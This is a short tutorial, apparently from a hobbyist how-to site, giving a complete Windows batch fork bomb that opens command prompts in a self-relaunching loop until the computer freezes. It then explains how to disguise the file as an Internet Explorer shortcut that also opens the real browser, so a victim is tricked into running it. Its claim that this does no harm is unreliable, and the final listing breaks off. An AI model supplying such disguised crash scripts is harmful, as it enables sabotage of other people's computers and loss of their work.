Introduction: Batch File to Crash a Computer

This time I will be showing you how to create a batch file to crash a computer.


This was posted for educational purposes only, I am not to be held responcible for any inappropriate usage of this information or the files that I may have provided. I am not to be held responsible for individuals or groups of people that suffer consequences of using this information or the files that I provided, these consequences include things such as expulsion, getting fired, or legal action.

Step 1: The Code

As usual we will begin by opening notepad. What this script will do is open command prompt six times then continuously loop so it will continue to open command prompt continuously until the computer freezes up or is turned off, this will not to any harm to the computer.

This is one of the most simple scripts ever. Just type

start
start
start
start
start
start
start crash



Then save the file as a batch file by putting .bat at the end of the file name while saving.
You will have to save the file name as crash.bat unless you change the bottom line of the script to a different name like

start launch

or whatever just if you wanna name the file something else change the last line of the code to something else.

Also if you want to make it more fun create a shortcut to your batch file, you can name the shortuc whatever you want, then right click on the shortcut go to properties then go to change icon, you can make the icon internet explorer and name the shortcut internet explorer.

To make this even more believeable at the top of the script above the first start you can put these two lines

@echo off
start C:\Program Files\Internet Explorer\iexplore.exe

So your final code would look like this

@echo off
start C:\Program Files\Internet Explorer\iexplore.exe
start
start
start
start
start
start